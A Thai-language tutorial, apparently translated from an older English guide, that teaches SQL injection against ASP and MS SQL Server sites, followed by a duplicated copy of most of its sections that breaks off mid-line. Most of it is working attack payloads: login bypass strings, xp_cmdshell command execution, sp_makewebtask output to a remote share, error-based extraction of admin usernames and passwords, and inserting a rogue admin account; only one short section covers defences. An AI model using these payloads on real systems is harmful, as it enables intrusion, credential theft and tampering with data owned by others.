SQL Injection
บทความต่อไปนี้พยายามที่จะช่วยให้ผู้เริ่มต้นที่กำลังเผชิญกับปัญหาเกี่ยวกับการใช้ SQL Injection เพื่อให้เกิดประโยชน์ และเพื่อป้องกันการโจมตีจากเทคนิคนี้
รายละเอียด
1.0 นำกันก่อนนะ?เมื่อระบบเปิดเฉพาะ port 80 คงไม่ต้องมานั่งเสียเวลาให้เปล่าในการควานหาช่องโหว่ เพราะผู้ดูแลระบบก็คงอุดช่องโหว่ไว้แล้ว ดังนั้นวิธีเดียวคือแฮกผ่านเวปซะเลย SQL injection คือหนทางนึงของการ Hack web ซึ่งไม่ต้องการอะไรนอกจาก port 80 วิธีนี้จะโจมตี web application (เช่น ASP, JSP, PHP, CGI, etc) มากกว่าที่จะเป็นการโจมตีเครื่อง server หรือ services ที่รันบนระบบปฏิบัติการบทความนี้ไม่ได้นำเสนอสิ่งใหม่ SQL Injection ถูกเปิดเผยและใช้กันอย่างกว้างขวาง เราเขียนบทความนี้เพราะเราต้องการบันทึกการใช้ SQL Injection ไว้เป็นเอกสาร และหวังว่าส่วนหนึ่งของมันจะเป็นประโยชน์กับผู้อื่น คุณสามารถหาข้อมูลเพิ่มเติมได้ในหัวข้อ “9.0 ข้อมูลเพิ่มเติม” (ขี้เกียจแปลสรุปเลย)
1.1 SQL Injection คืออะไรมันคือ trick ที่จะใส่คำสั่ง SQL ลงไปใน via (Vacation Internet Access ) web pages ที่เป็นไปได้เวปเพจหลายแห่งรับค่า parameter จากผู้ใช้ และสร้างคำสั่งร้องขอไปยังฐานข้อมูล ยกตัวอย่างกรณี login เวปเพจจะสร้างquery เพื่อไปตรวจสอบ user กะ pass ใน DB ว่าถูกต้องหรือไม่ ด้วย SQL Injection มันจะเป็นไปได้ที่จะส่ง userและ pass ที่ถูกสร้างขึ้น ซึ่งจะเปลี่ยน SQL query และ grant (ยินยอม) อะไรทำนองนั้น
1.2 สิ่งที่คุณต้องการ?web browser อะไรก็ได้
2.0 ควรจะมองหาอะไรต้องมองหาหน้าเวปที่สามารถ submit ได้ เช่น หน้า login, หน้า search, หน้า feedback ฯลฯ บางครั้งHTML Page จะใช้คำสั่ง post เพื่อส่งค่า parameter ไปยัง ASP Page อีกหน้าหนึ่ง คุณอาจจะเห็นหรือไม่เห็นค่าparameter ใน URL อย่างไรก็ตามคุณสามารถตรวจ source code สำหรับ HTML ได้ และมองหา “FORM” ในHTML code คุณจะพบเห็นคำสั่งหน้าตาประมาณนี้
ทุกๆ อย่างที่อยู่ระหว่าง และ มีค่าซึ่งอาจเป็นประโยชน์ก็ได้ (เทคนิคการทำ exploit)
2.1 ทำไงถ้าไม่พบหน้าที่มีช่องทาง Inputต้องพยายามมองหาหน้าเพจที่เป็น ASP, JSP, CGI, or PHP พยายามเจาะจงไปที่ URL ที่มีการรับค่าparameter เช่น :http://duck/index.aspid=10
3.0 คุณจะรู้ได้อย่างไรว่ามีจุดอ่อนเริ่มด้วยการทดสอบโดยใส่ค่าอย่างเช่นhi’ or 1=1–ลงไปในช่อง login หรือ pass หรือ URL ดังกล่าว เช่น?- Login: hi’ or 1=1–?- Pass: hi’ or 1=1–?- http://duck/index.aspid=hi’ or 1=1–ถ้าต้องการทำวิธีนี้เพื่อผ่านเข้าไปพื้นที่ซ่อนไว้ แค่ download source HTML มาเก็บไว้ในเครื่องแล้วแก้source ตามนี้ เช่น :ถ้าโชคดี จะผ่านเข้าไปได้โดยไม่ต้องใช้ user หรือ pass
3.1 แต่ทำไมต้องเป็น ‘ or 1=1–เราลองมาดูตัวอย่างอีกอันว่าทำไม ‘ or 1=1– ถึงสำคัญขนาดนี้ นอกจากจะ bypass login แล้ว มันยังเป็นไปได้ที่จะทำให้เรามองเห็นข้อมูลที่ไม่เปิดเผยโดยทั่วไปได้ เข้าไปหน้า ASP ที่เข้าไปสู่หน้าเพจอีกหน้าซึ่งมี URLประมาณนี้นะครับ :http://duck/index.aspcategory=foodตรง ‘category’ เป็นชื่อตัวแปร และ ‘food’ เป็นค่าที่ส่งให้ตัวแปร ‘category’ ตามคำสั่งนี้ ASP จะสร้าง code ตามนี้ (นี่เป็น code ที่เราสร้างขึ้นเพื่อการนี้เท่านั้น…ประมาณว่าของจริงอาจไม่ใช่แบบนี้ก็ได้…แนวๆ..อิอิ)v_cat = request(”category”)sqlstr=”SELECT * FROM product WHERE PCategory=’” & v_cat & “‘”set rs=conn.execute(sqlstr)เราจะเห็นได้ว่า ตัวแปรจะถูกเก็บไว้ในตัวแปรอีกตัวที่ชื่อ v_cat ดังนั้น SQL statement ควรจะเป็น :SELECT * FROM product WHERE PCategory=’food’ (ตรงนี้พวกไม่เคยเล่น query คงกำลังงง ว่ามันคืออะไร…อุอุอุ…พยายามต่อไปครับ ประเคนมาถึงขนาดนี้แล้ว ที่เหลือก็แค่หาช้อนมาตักเข้าปากเท่านั้น)ตาม query นี้ จะทำการดึงฐานข้อมูลแถวที่มี field คำว่า ‘food’ ออกมาที่นี่ เรามาลองเปลี่ยน URL ใหม่เป็นแบบนี้ดูนะครับhttp://duck/index.aspcategory=food’ or 1=1–เราจะเห็นว่าตัวแปร v_cat ของเรา จะถูกรวมเป็น “food’ or 1=1– ” (จากเดิมคือsqlstr=”SELECT * FROM product WHERE PCategory=’” & v_cat & “‘”) ถ้าเราแทนที่ SQL queryอย่างนี้แล้ว เราจะได้ query ใหม่เป็น :SELECT * FROM product WHERE PCategory=’food’ or 1=1–’เมื่อได้ query นี้ จะเป็นการเลือกทุกอย่างจากตารางฐานข้อมูลโดยไม่คำนึงถึง ค่า food ตัว “–” (อ่านว่าdouble dash ตัวขีดสองขีด) บอก MS SQL Server ให้เลิกสนใจ query ชั่วคราว ซึ่งจะกำจัดตัว single quote (’)ตัวสุดท้ายออกไป (ถูกป่าวหว่า) บางครั้ง อาจเป็นไปได้ที่จะแทนที่ “–” ด้วย “#”อย่างไรก็ตาม ถ้าหากว่าเขาไม่ใช้ SQL Server หรือคุณไม่สามารถทำ(ให้เลิกสนใจ query ชั่วคราว)ได้ ให้ลองตัวนี้แทน‘ or ‘a’='aซึ่งจะทำให้ SQL query เป็น :SELECT * FROM product WHERE PCategory=’food’ or ‘a’='a’ซึ่งจะ return ผลออกมาเหมือนๆ กันคุณสามารถลองเปลี่ยนแปลงได้ตามต่อไปนี้ :‘ or 1=1–” or 1=1–or 1=1–‘ or ‘a’='a” or “a”=”a‘) or (’a'=’a
4.0 แล้วจะทำ remote execute กับ SQL Injection ยังไงหละการที่จะสามารถที่จะ inject คำสั่ง SQL ได้นั้น เราต้องสามารถ execut SQL query ได้… โดยปกติแล้วเวปที่ติดตั้ง MS SQL Server นั้นจะถูกรันไว้โดย System ซึ่งมีค่าเท่ากับการที่ Admin เข้าสู่ระบบ Windows เราสามารถอาศัยขั้นตอนในการสำรอง(ถูกป่าวหว่า อันนี้งูๆ ปลาๆ ) เช่น master..xp_cmdshell ที่จะทำ remote execute‘; exec master..xp_cmdshell ‘ping 10.10.1.2′–ถ้า single quote (’) ใช้ไม่ได้ให้ลอง double quote (”)ตัว semi colon (;) จะเป็นการจบคำสั่ง SQL และอนุญาตให้คุณเริ่มคำสั่งใหม่ได้ หากต้องการตรวจสอบคำสั่งว่าสำเร็จหรือไม่ สามารถทำได้โดย listen ICMP packet ที่ 10.10.1.2 (อันนี้ผมคงต้องใช้โปรแกรมช่วย) ดูว่าถ้ามี packetใดๆ จาก server เช่น :#tcpdump icmpถ้าไม่รับอะไรเลย แถมมี error message อีกตะหาก เป็นไปได้ว่า Admin ได้จำกัดการเข้าถึงของผู้ใช้เวปด้านการทำ stored procedures ไว้เรียบร้อยแล้ว (ปิดช่องโหว่ซะแล้ว …ทำไงต่อหละเนี๊ยะ)
5.0 ทำไงที่จะได้มาซึ่งผลลัพธ์จากการใช้ mySQL queryเป็นไปได้ที่จะใช้ sp_makewebtask เขียน query เข้าไปใน HTML :‘; EXEC master..sp_makewebtask “\\10.10.1.3\share\output.html“, “SELECT * FROM INFORMATION_SCHEMA.TABLES”แต่ IP ของเป้าหมายต้องมี folder ที่เปิด share ไว้แบบ Everyone
6.0 แล้วทำไงจะได้ข้อมูลจาก DB ที่ใช้ ODBC error message หละเราสามารถใช้ข้อมูลจาก error message ที่มาจาก MS SQL Server ได้ เพื่อจะได้มาซึ่งข้อมูลที่เราต้องการทดลองเข้าเวปแบบนี้ดูนะhttp://duck/index.aspid=10เราสามารถลองใช้คำสั่ง UNION จำนวนเต็ม ‘10′ ร่วมกับคำสั่งหรือตัวแปรอื่นๆ ได้ (มั่วไปนั่น) :http://duck/index.aspid=10 UNION SELECT TOP 1 TABLE_NAME FROM INFORMATION_SCHEMA.TABLES–ตาราง INFORMATION_SCHEMA.TABLES ประกอบด้วยข้อมูลของทุกๆ ตารางใน server (ควรศึกษาเรื่อง DB เพิ่มเติมนะครับ จะมองเห็นภาพเอง) ส่วน field ที่ชื่อ TABLE_NAME นั้นประกอบด้วยชื่อของตารางต่างๆ ในฐานข้อมูลอย่างไม่ต้องสงสัย (ตามระบบของ DB จะมีตารางที่เก็บรายชื่อของตาราง คล้ายสารบัญตารางอะไรทำนองนั้น เพื่อใช้ในการอ้างอิงและง่ายต่อการค้นหา) เหตุที่เลือกตารางนี้เพราะเรารู้ว่ามันมีอยู่จริงๆ query คือSELECT TOP 1 TABLE_NAME FROM INFORMATION_SCHEMA.TABLES–มันจะ return ชื่อของตารางแรกในฐานข้อมูล เมื่อเรา UNION คำสั่งนี้กับจำนวนเต็ม 10 แล้ว MS SQL serverจะพยายามแปลง string(nvarchar) ไปเป็น integer (ชนิดของตัวแปล) ซึ่งจะทำให้เกิด error (ความผิดพลาด) ขึ้น (ซึ่งปกติเราไม่สามารถแปลงตัวแปร string ไปเป็น interger ได้) ทำให้ server แสดงข้อความ error ออกมาอย่านี้ :Microsoft OLE DB Provider for ODBC Drivers error ‘80040e07′[Microsoft][ODBC SQL Server Driver][SQL Server]Syntax error converting the nvarchar value ‘table1′ to a column of data type int./index.asp, line 5ข้อความข้างบนนี้แสดงให้เราเห็นได้ว่า มันไม่สามารถแปลงตัวแปร string ไปเป็น integer (แปลงข้อความเป็นตัวเลข)ได้ในกรณีนี้ เราได้รับชื่อของตารางแรกในฐานข้อมูลมาแล้ว คือ “table 1″เพื่อที่จะเอาชื่อของตารางต่อไป เราต้องใช้คำสั่งต่อไปนี้http://duck/index.aspid=10 UNION SELECT TOP 1 TABLE_NAME FROM INFORMATION_SCHEMA.TABLES WHERE TABLE_NAME NOT IN (’table1′)–เรายังสามารถค้นหาข้อมูลโดยใช้ keyword ทำนองเดียวกันนี้ :http://duck/index.aspid=10 UNION SELECT TOP 1 TABLE_NAME FROM INFORMATION_SCHEMA.TABLES WHERE TABLE_NAME LIKE ‘%25login%25′–ซึ่งผลที่ได้รับคือMicrosoft OLE DB Provider for ODBC Drivers error ‘80040e07′[Microsoft][ODBC SQL Server Driver][SQL Server]Syntax error converting the nvarchar value ‘admin_login’ to a column of data type int./index.asp, line 5ข้อความ ‘%25login%25′ จะถูกมองเห็นเป็น %login% ใน SQL server ในกรณีนี้เราก็จะได้ตารางชื่อ “admin_login”มาแล้ว
6.1 เราจะทำเหมืองข้อมูล(กรรมวิธีที่ใช้ในการแยกแยะข้อมูลเป็น DB)เกี่ยวกับชื่อ column ในตารางทั้งหมดได้ยังไงเราสามารถใช้ประโยชน์อีกอย่างหนึ่งจาก INFORMATION_SCHEMA.COLUMNS เพื่อแสดงชื่อ columnsทั้งหมดออกมา :http://duck/index.aspid=10 UNION SELECT TOP 1 COLUMN_NAME FROM INFORMATION_SCHEMA.COLUMNS WHERE TABLE_NAME=’admin_login’–ผลที่ได้คือ :Microsoft OLE DB Provider for ODBC Drivers error ‘80040e07′[Microsoft][ODBC SQL Server Driver][SQL Server]Syntax error converting the nvarchar value ‘login_id’ to a column of data type int./index.asp, line 5จากผลที่ได้นี้ เราก็จะได้ชื่อ column แรกมา เรายังสามารถใช้ NOT IN () เพื่อจะได้ชื่อ column ถัดไปดังนี้ :http://duck/index.aspid=10 UNION SELECT TOP 1 COLUMN_NAME FROM INFORMATION_SCHEMA.COLUMNS WHERE TABLE_NAME=’admin_login’ WHERE COLUMN_NAME NOT IN (’login_id’)–ซึ่งผลที่ได้คือMicrosoft OLE DB Provider for ODBC Drivers error ‘80040e07′[Microsoft][ODBC SQL Server Driver][SQL Server]Syntax error converting the nvarchar value ‘login_name’ to a column of data type int./index.asp, line 5เมื่อเราทำไปเรื่อยๆเราก็จะเจอชื่อ column เช่น “password”, “details” ซึ่งเราจะรู้ได้ว่าเจอแล้วเมื่อปรากฏข้อความ error ดังนี้http://duck/index.aspid=10 UNION SELECT TOP 1 COLUMN_NAME FROM INFORMATION_SCHEMA.COLUMNS WHERE TABLE_NAME=’admin_login’ WHERE COLUMN_NAME NOT IN (’login_id’,'login_name’,'password’,details’)–ผลที่ได้คือMicrosoft OLE DB Provider for ODBC Drivers error ‘80040e14′[Microsoft][ODBC SQL Server Driver][SQL Server]ORDER BY items must appear in the select list if the statement contains a UNION operator./index.asp, line 5
6.2 ทำไงถึงจะได้มาซึ่งข้อมูลทุกอย่างตอนนี้เราสามารถระบุชื่อและcolumn ของตารางที่สำคัญๆ ได้แล้ว เราก็ยังคงใช้เทคนิคเดียวกันนี้กับข้อมูลอื่นๆที่เราต้องการจากฐานข้อมูลมองลองเอาชื่อ login_name จากตาราง “admin_login” กัน :http://duck/index.aspid=10 UNION SELECT TOP 1 login_name FROM admin_login–ผลที่ได้จากด้านบนคือMicrosoft OLE DB Provider for ODBC Drivers error ‘80040e07′[Microsoft][ODBC SQL Server Driver][SQL Server]Syntax error converting the nvarchar value ‘neo’ to a column of data type int./index.asp, line 5ที่นี้เราก็จะรู้ชื่อของ admin ที่มี login_name ว่า “neo” สุดท้าย เอา pass ของ “neo” มาจาก DB :http://duck/index.aspid=10 UNION SELECT TOP 1 password FROM admin_login where login_name=’neo’–ผลที่ได้คือMicrosoft OLE DB Provider for ODBC Drivers error ‘80040e07′[Microsoft][ODBC SQL Server Driver][SQL Server]Syntax error converting the nvarchar value ‘m4trix’ to a column of data type int./index.asp, line 5เราก็จะสามารถ login ได้โดยใช้ user เป็น neo และ passwrod เป็น m4trix
6.3 วิธีที่จะได้มาซึ่งค่า numeric string (ข้อความที่เป็นตัวเลข…อันนี้ต้องเคยเขียนโปรแกรมจึงจะเข้าใจประเภทของตัวแปร)ค่อนข้างจะมีข้อจำกัดสำหรับเทคนิคนี้ คือเราไม่สามารถทำ error message ได้ถ้าต้องการจะ แปลงข้อความเป็นตัวเลขล้วนๆ พูดง่ายๆ คือ หากเราต้องการจะเอา pass ของคนที่ชื่อ “trinity” ซึ่งเขามี pass เป็น “31173″ ซึ่งเป็นตัวเลขทั้งหมด :http://duck/index.aspid=10 UNION SELECT TOP 1 password FROM admin_login where login_name=’trinity’–เราจะพบว่า ผลที่ได้จะเจอกับ “Page Not Found” เพราะ “31173″ ซึ่งเป็น string จะถูกแปลงไปเป็น numberก่อนที่จะทำการ UNION กับจำนวนเต็มดังกล่าว (ในที่นี้คือ 10) และหากว่าการ UNION ใช้ได้หรือถูกต้องนั้น SQL server จะไม่ส่ง error message ออกมา ดังนั้น เราจะไม่สามารถมองเห็นค่าตัวเลขใดๆ เลย (อืมข้อนี้น่าสนใจ เอาไว้ใช้เวลาตั้ง pass สำหรับadmin ได้นะ)การแก้ปัญหานี้ เราสามารถเชื่อมโยง numeric string กับ ตัวอักษรบางตัวแทน ซึ่งต้องมั่นใจว่าการแปลงนั้นส่งผลผิดพลาดแน่นอน(เพื่อจะให้ server ส่ง error message ออกมา) เรามาลองคำสั่งนี้แทน :http://duck/index.aspid=10 UNION SELECT TOP 1 convert(int, password%2b’%20morpheus’) FROM admin_login where login_name=’trinity’–เราใช้เครื่องหมาย + เพิ่มเข้าไปใน passwd กับ ตัวอักษร ที่เราต้องการ (รหัส ASSCII สำหรับเครื่องหมาย ‘+’ คือ 0×2b)เรายังเพิ่ม ‘(ช่องว่าง)morpheus’ เข้าไปในช่อง passwd ด้วย เพราะฉะนั้นเมื่อเรามีเลข ‘31173′ มันจะกลายเป็น ‘31173 morpheus’โดยปกติเรียกกันว่าฟังก์ชั่น convert() ซึ่งจะพยายามแปลง ‘31173 morpheus’ ไปเป็นตัวเลขซึ่งจะทำให้ SQL server ส่งerror message ออกมาดังนี้ :Microsoft OLE DB Provider for ODBC Drivers error ‘80040e07′[Microsoft][ODBC SQL Server Driver][SQL Server]Syntax error converting the nvarchar value ‘31173 morpheus’ to a column of data type int./index.asp, line 5คราวนี้คุณก็สามารถ login ได้โดยใช้ passwd เป็น ‘31173′
7.0 แล้วเราจะสามารถ update/insert ข้อมูลลงไปใน DB ได้รึป่าวถ้าเรารู้ชื่อของตารางและ column แล้วมันก็เป็นไปได้ที่เราจะสามารถใช้คำสั่ง UPDATE หรือ INSERT ข้อมูลลงไปในตารางได้ ยกตัวอย่างเช่น การเปลี่ยน passwd ของคนที่ชื่อ “neo” (แปลมาถึงตรงนี้เห็นได้ว่า คนเขียนบ้าหนังเรื่อง Matrixพอสมควร) ทำได้ดังนี้ :http://duck/index.aspid=10; INSERT INTO ‘admin_login’ (’login_id’, ‘login_name’, ‘password’, ‘details’) VALUES (666,’neo2′,’newpas5′,’NA’)–ทีนี่เราก็จะสามารถ login ได้ในชื่อ neo2 และ pass คือ newpas5
8.0 แล้วจะหลีกเลี่ยงวิธีนี้ได้ไงอะกรองตัวอักษรเช่น single quote, double quote, slash, back slash, semi colon extended ตัวอักษรเช่น NULL การ enter การขึ้นบรรทัดใหม่ ฯลฯ ที่เข้ามาในรูป String :?- จาก Input ของ users?- ค่า Parameters จาก URL?- ค่าจากตัวแปร cookieสำหรับค่าทีเป็นตัวเลขให้แปลงเป็น จำนวนเต็มก่อนที่จะวางลงไปในคำสั่ง SQL หรือจะใช้คำสั่ง ISNUMERIC เพื่อให้แน่ใจว่าเป็นตัวเลขจำนวนเต็มเปลี่ยน “Startup and run SQL Server” โดยปรับ privilege ให้อยู่ในระดับ low ใน SQL Server Security tabลบ stored procedures ที่ไม่ใช้แล้วทิ้ง เช่น :master..Xp_cmdshell, xp_startmail, xp_sendmail, sp_makewebtask
9.0 ข้อมูลเพิ่มเติมในช่วงแรกๆ ในการทำงานเรื่อง SQL Injection นี้ เราได้ค้นพบเอกสารจากเวป Rain Forest Puppy เกี่ยวกับการ hackด้วยวิธี PacketStrom :http://www.wiretrip.net/rfp/p/doc.aspid=42&iface=6
บทความดีๆ เกี่ยวกับ ODBC error message :http://www.blackhat.com/presentations/win-usa-01/Litchfield/BHWin01Litchfield.doc
บทสรุปดีๆ สำหรับ SQL Injection ในหลายๆ SQL serverhttp://www.owasp.org/asac/input_validation/sql.shtml
บทความของ Sensepost เกี่ยวกับ SQL Injectionhttp://www.sensepost.com/misc/SQLinsertion.htm
อื่นๆ เพิ่มเติมhttp://www.digitaloffense.net/wargames01/IOWargames.ppthttp://www.wiretrip.net/rfp/p/doc.aspid=7&iface=6http://www.wiretrip.net/rfp/p/doc.aspid=60&iface=6http://www.spidynamics.com/whitepapers/WhitepaperSQLInjection.pdf
1.0 นำกันก่อนนะ?เมื่อระบบเปิดเฉพาะ port 80 คงไม่ต้องมานั่งเสียเวลาให้เปล่าในการควานหาช่องโหว่ เพราะผู้ดูแลระบบก็คงอุดช่องโหว่ไว้แล้ว ดังนั้นวิธีเดียวคือแฮกผ่านเวปซะเลย SQL injection คือหนทางนึงของการ Hack web ซึ่งไม่ต้องการอะไรนอกจาก port 80 วิธีนี้จะโจมตี web application (เช่น ASP, JSP, PHP, CGI, etc) มากกว่าที่จะเป็นการโจมตีเครื่อง server หรือ services ที่รันบนระบบปฏิบัติการบทความนี้ไม่ได้นำเสนอสิ่งใหม่ SQL Injection ถูกเปิดเผยและใช้กันอย่างกว้างขวาง เราเขียนบทความนี้เพราะเราต้องการบันทึกการใช้ SQL Injection ไว้เป็นเอกสาร และหวังว่าส่วนหนึ่งของมันจะเป็นประโยชน์กับผู้อื่น คุณสามารถหาข้อมูลเพิ่มเติมได้ในหัวข้อ “9.0 ข้อมูลเพิ่มเติม” (ขี้เกียจแปลสรุปเลย)
1.1 SQL Injection คืออะไรมันคือ trick ที่จะใส่คำสั่ง SQL ลงไปใน via (Vacation Internet Access ) web pages ที่เป็นไปได้เวปเพจหลายแห่งรับค่า parameter จากผู้ใช้ และสร้างคำสั่งร้องขอไปยังฐานข้อมูล ยกตัวอย่างกรณี login เวปเพจจะสร้างquery เพื่อไปตรวจสอบ user กะ pass ใน DB ว่าถูกต้องหรือไม่ ด้วย SQL Injection มันจะเป็นไปได้ที่จะส่ง userและ pass ที่ถูกสร้างขึ้น ซึ่งจะเปลี่ยน SQL query และ grant (ยินยอม) อะไรทำนองนั้น
1.2 สิ่งที่คุณต้องการ?web browser อะไรก็ได้
2.0 ควรจะมองหาอะไรต้องมองหาหน้าเวปที่สามารถ submit ได้ เช่น หน้า login, หน้า search, หน้า feedback ฯลฯ บางครั้งHTML Page จะใช้คำสั่ง post เพื่อส่งค่า parameter ไปยัง ASP Page อีกหน้าหนึ่ง คุณอาจจะเห็นหรือไม่เห็นค่าparameter ใน URL อย่างไรก็ตามคุณสามารถตรวจ source code สำหรับ HTML ได้ และมองหา “FORM” ในHTML code คุณจะพบเห็นคำสั่งหน้าตาประมาณนี้
ทุกๆ อย่างที่อยู่ระหว่าง
2.1 ทำไงถ้าไม่พบหน้าที่มีช่องทาง Inputต้องพยายามมองหาหน้าเพจที่เป็น ASP, JSP, CGI, or PHP พยายามเจาะจงไปที่ URL ที่มีการรับค่าparameter เช่น :http://duck/index.aspid=10
3.0 คุณจะรู้ได้อย่างไรว่ามีจุดอ่อนเริ่มด้วยการทดสอบโดยใส่ค่าอย่างเช่นhi’ or 1=1–ลงไปในช่อง login หรือ pass หรือ URL ดังกล่าว เช่น?- Login: hi’ or 1=1–?- Pass: hi’ or 1=1–?- http://duck/index.aspid=hi’ or 1=1–ถ้าต้องการทำวิธีนี้เพื่อผ่านเข้าไปพื้นที่ซ่อนไว้ แค่ download source HTML มาเก็บไว้ในเครื่องแล้วแก้source ตามนี้ เช่น :ถ้าโชคดี จะผ่านเข้าไปได้โดยไม่ต้องใช้ user หรือ pass
3.1 แต่ทำไมต้องเป็น ‘ or 1=1–เราลองมาดูตัวอย่างอีกอันว่าทำไม ‘ or 1=1– ถึงสำคัญขนาดนี้ นอกจากจะ bypass login แล้ว มันยังเป็นไปได้ที่จะทำให้เรามองเห็นข้อมูลที่ไม่เปิดเผยโดยทั่วไปได้ เข้าไปหน้า ASP ที่เข้าไปสู่หน้าเพจอีกหน้าซึ่งมี URLประมาณนี้นะครับ :http://duck/index.aspcategory=foodตรง ‘category’ เป็นชื่อตัวแปร และ ‘food’ เป็นค่าที่ส่งให้ตัวแปร ‘category’ ตามคำสั่งนี้ ASP จะสร้าง code ตามนี้ (นี่เป็น code ที่เราสร้างขึ้นเพื่อการนี้เท่านั้น…ประมาณว่าของจริงอาจไม่ใช่แบบนี้ก็ได้…แนวๆ..อิอิ)v_cat = request(”category”)sqlstr=”SELECT * FROM product WHERE PCategory=’” & v_cat & “‘”set rs=conn.execute(sqlstr)เราจะเห็นได้ว่า ตัวแปรจะถูกเก็บไว้ในตัวแปรอีกตัวที่ชื่อ v_cat ดังนั้น SQL statement ควรจะเป็น :SELECT * FROM product WHERE PCategory=’food’ (ตรงนี้พวกไม่เคยเล่น query คงกำลังงง ว่ามันคืออะไร…อุอุอุ…พยายามต่อไปครับ ประเคนมาถึงขนาดนี้แล้ว ที่เหลือก็แค่หาช้อนมาตักเข้าปากเท่านั้น)ตาม query นี้ จะทำการดึงฐานข้อมูลแถวที่มี field คำว่า ‘food’ ออกมาที่นี่ เรามาลองเปลี่ยน URL ใหม่เป็นแบบนี้ดูนะครับhttp://duck/index.aspcategory=food’ or 1=1–เราจะเห็นว่าตัวแปร v_cat ของเรา จะถูกรวมเป็น “food’ or 1=1– ” (จากเดิมคือsqlstr=”SELECT * FROM product WHERE PCategory=’” & v_cat & “‘”) ถ้าเราแทนที่ SQL queryอย่างนี้แล้ว เราจะได้ query ใหม่เป็น :SELECT * FROM product WHERE PCategory=’food’ or 1=1–’เมื่อได้ query นี้ จะเป็นการเลือกทุกอย่างจากตารางฐานข้อมูลโดยไม่คำนึงถึง ค่า food ตัว “–” (อ่านว่าdouble dash ตัวขีดสองขีด) บอก MS SQL Server ให้เลิกสนใจ query ชั่วคราว ซึ่งจะกำจัดตัว single quote (’)ตัวสุดท้ายออกไป (ถูกป่าวหว่า) บางครั้ง อาจเป็นไปได้ที่จะแทนที่ “–” ด้วย “#”อย่างไรก็ตาม ถ้าหากว่าเขาไม่ใช้ SQL Server หรือคุณไม่สามารถทำ(ให้เลิกสนใจ query ชั่วคราว)ได้ ให้ลองตัวนี้แทน‘ or ‘a’='aซึ่งจะทำให้ SQL query เป็น :SELECT * FROM product WHERE PCategory=’food’ or ‘a’='a’ซึ่งจะ return ผลออกมาเหมือนๆ กันคุณสามารถลองเปลี่ยนแปลงได้ตามต่อไปนี้ :‘ or 1=1–” or 1=1–or 1=1–‘ or ‘a’='a” or “a”=”a‘) or (’a'=’a
4.0 แล้วจะทำ remote execute กับ SQL Injection ยังไงหละการที่จะสามารถที่จะ inject คำสั่ง SQL ได้นั้น เราต้องสามารถ execut SQL query ได้… โดยปกติแล้วเวปที่ติดตั้ง MS SQL Server นั้นจะถูกรันไว้โดย System ซึ่งมีค่าเท่ากับการที่ Admin เข้าสู่ระบบ Windows เราสามารถอาศัยขั้นตอนในการสำรอง(ถูกป่าวหว่า อันนี้งูๆ ปลาๆ ) เช่น master..xp_cmdshell ที่จะทำ remote execute‘; exec master..xp_cmdshell ‘ping 10.10.1.2′–ถ้า single quote (’) ใช้ไม่ได้ให้ลอง double quote (”)ตัว semi colon (;) จะเป็นการจบคำสั่ง SQL และอนุญาตให้คุณเริ่มคำสั่งใหม่ได้ หากต้องการตรวจสอบคำสั่งว่าสำเร็จหรือไม่ สามารถทำได้โดย listen ICMP packet ที่ 10.10.1.2 (อันนี้ผมคงต้องใช้โปรแกรมช่วย) ดูว่าถ้ามี packetใดๆ จาก server เช่น :#tcpdump icmpถ้าไม่รับอะไรเลย แถมมี error message อีกตะหาก เป็นไปได้ว่า Admin ได้จำกัดการเข้าถึงของผู้ใช้เวปด้านการทำ stored procedures ไว้เรียบร้อยแล้ว (ปิดช่องโหว่ซะแล้ว …ทำไงต่อหละเนี๊ยะ)
5.0 ทำไงที่จะได้มาซึ่งผลลัพธ์จากการใช้ mySQL queryเป็นไปได้ที่จะใช้ sp_makewebtask เขียน query เข้าไปใน HTML :‘; EXEC master..sp_makewebtask “\\10.10.1.3\share\output.html“, “SELECT * FROM INFORMATION_SCHEMA.TABLES”แต่ IP ของเป้าหมายต้องมี folder ที่เปิด share ไว้แบบ Everyone
6.0 แล้วทำไงจะได้ข้อมูลจาก DB ที่ใช้ ODBC error message หละเราสามารถใช้ข้อมูลจาก error message ที่มาจาก MS SQL Server ได้ เพื่อจะได้มาซึ่งข้อมูลที่เราต้องการทดลองเข้าเวปแบบนี้ดูนะhttp://duck/index.aspid=10เราสามารถลองใช้คำสั่ง UNION จำนวนเต็ม ‘10′ ร่วมกับคำสั่งหรือตัวแปรอื่นๆ ได้ (มั่วไปนั่น) :http://duck/index.aspid=10 UNION SELECT TOP 1 TABLE_NAME FROM INFORMATION_SCHEMA.TABLES–ตาราง INFORMATION_SCHEMA.TABLES ประกอบด้วยข้อมูลของทุกๆ ตารางใน server (ควรศึกษาเรื่อง DB เพิ่มเติมนะครับ จะมองเห็นภาพเอง) ส่วน field ที่ชื่อ TABLE_NAME นั้นประกอบด้วยชื่อของตารางต่างๆ ในฐานข้อมูลอย่างไม่ต้องสงสัย (ตามระบบของ DB จะมีตารางที่เก็บรายชื่อของตาราง คล้ายสารบัญตารางอะไรทำนองนั้น เพื่อใช้ในการอ้างอิงและง่ายต่อการค้นหา) เหตุที่เลือกตารางนี้เพราะเรารู้ว่ามันมีอยู่จริงๆ query คือSELECT TOP 1 TABLE_NAME FROM INFORMATION_SCHEMA.TABLES–มันจะ return ชื่อของตารางแรกในฐานข้อมูล เมื่อเรา UNION คำสั่งนี้กับจำนวนเต็ม 10 แล้ว MS SQL serverจะพยายามแปลง string(nvarchar) ไปเป็น integer (ชนิดของตัวแปล) ซึ่งจะทำให้เกิด error (ความผิดพลาด) ขึ้น (ซึ่งปกติเราไม่สามารถแปลงตัวแปร string ไปเป็น interger ได้) ทำให้ server แสดงข้อความ error ออกมาอย่านี้ :Microsoft OLE DB Provider for ODBC Drivers error ‘80040e07′[Microsoft][ODBC SQL Server Driver][SQL Server]Syntax error converting the nvarchar value ‘table1′ to a column of data type int./index.asp, line 5ข้อความข้างบนนี้แสดงให้เราเห็นได้ว่า มันไม่สามารถแปลงตัวแปร string ไปเป็น integer (แปลงข้อความเป็นตัวเลข)ได้ในกรณีนี้ เราได้รับชื่อของตารางแรกในฐานข้อมูลมาแล้ว คือ “table 1″เพื่อที่จะเอาชื่อของตารางต่อไป เราต้องใช้คำสั่งต่อไปนี้http://duck/index.aspid=10 UNION SELECT TOP 1 TABLE_NAME FROM INFORMATION_SCHEMA.TABLES WHERE TABLE_NAME NOT IN (’table1′)–เรายังสามารถค้นหาข้อมูลโดยใช้ keyword ทำนองเดียวกันนี้ :http://duck/index.aspid=10 UNION SELECT TOP 1 TABLE_NAME FROM INFORMATION_SCHEMA.TABLES WHERE TABLE_NAME LIKE ‘%25login%25′–ซึ่งผลที่ได้รับคือMicrosoft OLE DB Provider for ODBC Drivers error ‘80040e07′[Microsoft][ODBC SQL Server 